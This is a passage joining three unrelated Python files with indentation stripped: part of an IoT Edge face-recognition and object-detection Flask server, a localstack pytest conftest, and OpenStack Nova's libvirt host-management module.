telemetry = {'timestamp':'{0:%Y-%m-%dT%H:%M:%S.%fZ}'.format(nowTime), 'face-recognition': detectedObjects }
sendMsg = json.dumps(telemetry)
# iotClient.send_message(sendMsg, 'face_recognition_monitor')
iotClient.send_message(sendMsg, MSG_OUTPUT_PATH_FR)
logging.info('Send detection message to face_recognition_monitor of IoT Edge Runtime')
if len(detectedObjects) > 0 :
logging.info(f'check time - timeDelta.seconds={timeDelta.seconds}')
if timeDelta.seconds > intervalSec:
logging.info('scored long again.')
if fileUploader:
imageData = None
if inferenceMark:
pilImage = cv2pil(output_frame)
imageData = io.BytesIO()
pilImage.save(imageData,'JPEG')
imageData = imageData.getvalue()
# imageData = open(inferencedImageFile, 'rb')
# pilImage = Image.open(imageData)
else:
imageData = io.BytesIO(request.get_data())
fileUploader.upload(imageData, IOTEDGE_DEVICEID, '{0:%Y%m%d%H%M%S%f}'.format(nowTime), 'jpg')
# if inferenceMark:
# imageData.close()
respBody = {
'inferences' : detectedObjects
}
respBody = json.dumps(respBody)
logging.info(f'Sending response - {respBody}')
return Response(respBody, status=200, mimetype='application/json')
else :
logging.info('Sending empty response')
return Response(status=204)
except Exception as e:
if configLock.locked():
configLock.release()
logging.error(f'exception - {e}')
return Response(response='Exception occured while processing face recognition of the image.', status=500)
@app.route("/objectdetection", methods = ['POST'])
async def objectdetection():
try:
global intervalSec, inferenceMark, sendDetection
logging.info('received request')
# import pdb; pdb.set_trace()
imageData = io.BytesIO(request.get_data())
pilImage = Image.open((imageData))
frame = pil2cv(pilImage)
logging.info('Scoring...')
configLock.acquire()
nowTime = datetime.datetime.now()
timeDelta = nowTime - objectDetector.GetScoredTime()
detectedObjects, output_frame = objectDetector.Score(frame, inferenceMark)
isSendTelemetry = sendDetection
configLock.release()
logging.info('Scored.')
if isSendTelemetry and len(detectedObjects)>0:
totalDtected = 0
detected = {}
for d in detectedObjects:
label = d['entity']['tag']['value']
if label in detected:
detected[label] = detected[label] + 1
else:
detected[label] = 1
totalDtected = totalDtected + 1
telemetry = {'timestamp':'{0:%Y-%m-%dT%H:%M:%S.%fZ}'.format(nowTime), 'totaldetection': totalDtected, 'detected':detected, 'detectedObjects':detectedObjects }
sendMsg = json.dumps(telemetry)
iotClient.send_message(sendMsg, MSG_OUTPUT_PATH_OD)
logging.info('Send detection message to detection_monitor of IoT Edge Runtime')
if len(detectedObjects) > 0 :
if timeDelta.seconds > intervalSec:
logging.info('scored long again.')
if fileUploader:
imageData = None
if inferenceMark:
pilImage = cv2pil(output_frame)
imageData = io.BytesIO()
pilImage.save(imageData,'JPEG')
imageData = imageData.getvalue()
# imageData = open(inferencedImageFile, 'rb')
# pilImage = Image.open(imageData)
else:
imageData = io.BytesIO(request.get_data())
fileUploader.upload(imageData, IOTEDGE_DEVICEID, '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now()), 'jpg')
# if inferenceMark:
# imageData.close()
scored_time = nowTime
respBody = {
'inferences' : detectedObjects
}
respBody = json.dumps(respBody)
logging.info(f'Sending response - {respBody}')
return Response(respBody, status=200, mimetype='application/json')
else :
logging.info('Sending empty response')
return Response(status=204)
except Exception as e:
if configLock.locked():
configLock.release()
logging.error(f'exception - {e}')
return Response(response='Exception occured while processing object detection of the image.', status=500)
@app.route("/")
def healty():
return "Healthy"
app.run(host='0.0.0.0', port=8888)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
|
conftest.py
|
"""
Pytest configuration that spins up a single localstack instance that is shared across test modules.
See: https://docs.pytest.org/en/6.2.x/fixture.html#conftest-py-sharing-fixtures-across-multiple-files
It is thread/process safe to run with pytest-parallel, however not for pytest-xdist.
"""
import logging
import multiprocessing as mp
import os
import threading
import pytest
from localstack import config
from localstack.config import is_env_true
from localstack.constants import ENV_INTERNAL_TEST_RUN
from localstack.services import infra
from localstack.utils.analytics.profiler import profiled
from localstack.utils.common import safe_requests
from tests.integration.test_elasticsearch import ElasticsearchTest
from tests.integration.test_terraform import TestTerraform
logger = logging.getLogger(__name__)
localstack_started = mp.Event() # event indicating whether localstack has been started
localstack_stop = mp.Event() # event that can be triggered to stop localstack
localstack_stopped = mp.Event() # event indicating that localstack has been stopped
startup_monitor_event = mp.Event() # event that can be triggered to start localstack
# collection of functions that should be executed to initialize tests
test_init_functions = set()
@pytest.hookimpl()
def pytest_configure(config):
# first pytest lifecycle hook
_start_monitor()
def pytest_runtestloop(session):
# second pytest lifecycle hook (before test runner starts)
# collect test classes
test_classes = set()
for item in session.items:
if item.parent and item.parent.cls:
test_classes.add(item.parent.cls)
# add init functions for certain tests that download/install things
for test_class in test_classes:
# set flag that terraform will be used
if TestTerraform is test_class:
logger.info("will initialize TestTerraform")
test_init_functions.add(TestTerraform.init_async)
continue
if ElasticsearchTest is test_class:
logger.info("will initialize ElasticsearchTest")
test_init_functions.add(ElasticsearchTest.init_async)
continue
if not session.items:
return
if session.config.option.collectonly:
return
# trigger localstack startup in startup_monitor and wait until it becomes ready
startup_monitor_event.set()
localstack_started.wait()
@pytest.hookimpl()
def pytest_unconfigure(config):
# last pytest lifecycle hook (before pytest exits)
_trigger_stop()
def _start_monitor():
threading.Thread(target=startup_monitor).start()
def _trigger_stop():
localstack_stop.set()
startup_monitor_event.set()
def startup_monitor() -> None:
"""
The startup monitor is a thread that waits for the startup_monitor_event and, once the event is true, starts a
localstack instance in it's own thread context.
"""
logger.info("waiting on localstack_start signal")
startup_monitor_event.wait()
if localstack_stop.is_set():
# this is called if _trigger_stop() is called before any test has requested the localstack_runtime fixture.
logger.info("ending startup_monitor")
localstack_stopped.set()
return
if is_env_true("TEST_SKIP_LOCALSTACK_START"):
logger.info("TEST_SKIP_LOCALSTACK_START is set, not starting localstack")
localstack_started.set()
return
logger.info("running localstack")
run_localstack()
def run_localstack():
"""
Start localstack and block until it terminates. Terminate localstack by calling _trigger_stop().
"""
# configure
os.environ[ENV_INTERNAL_TEST_RUN] = "1"
safe_requests.verify_ssl = False
config.FORCE_SHUTDOWN = False
config.EDGE_BIND_HOST = "0.0.0.0"
def watchdog():
logger.info("waiting stop event")
localstack_stop.wait() # triggered by _trigger_stop()
logger.info("stopping infra")
infra.stop_infra()
def start_profiling(*args):
if not config.USE_PROFILER:
return
@profiled()
def profile_func():
# keep profiler active until tests have finished
localstack_stopped.wait()
print("Start profiling...")
profile_func()
print("Done profiling...")
monitor = threading.Thread(target=watchdog)
monitor.start()
logger.info("starting localstack infrastructure")
infra.start_infra(asynchronous=True)
threading.Thread(target=start_profiling).start()
for fn in test_init_functions:
try:
# asynchronous init functions
fn()
except Exception:
logger.exception("exception while running init function for test")
logger.info("waiting for infra to be ready")
infra.INFRA_READY.wait() # wait for infra to start (threading event)
localstack_started.set() # set conftest inter-process Event
logger.info("waiting for shutdown")
try:
logger.info("waiting for watchdog to join")
monitor.join()
finally:
logger.info("ok bye")
localstack_stopped.set()
@pytest.fixture(scope="session", autouse=True)
def localstack_runtime():
"""
This is a dummy fixture. Each test requests the fixture, but it actually just makes sure that localstack is running,
blocks until localstack is running, or starts localstack the first time the fixture is requested.
It doesn't actually do anything but signal to the `startup_monitor` function.
"""
if localstack_started.is_set():
# called by all tests after the startup has completed and the initial tests are unblocked
yield
return
startup_monitor_event.set()
localstack_started.wait()
yield
return
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("queue" if six.PY3 else "Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when a event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
# TODO(sahid): needs to be private
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise a exception.NovaException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def get_guest(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
"""
return libvirt_guest.Guest(
self.get_domain(instance))
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: %(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
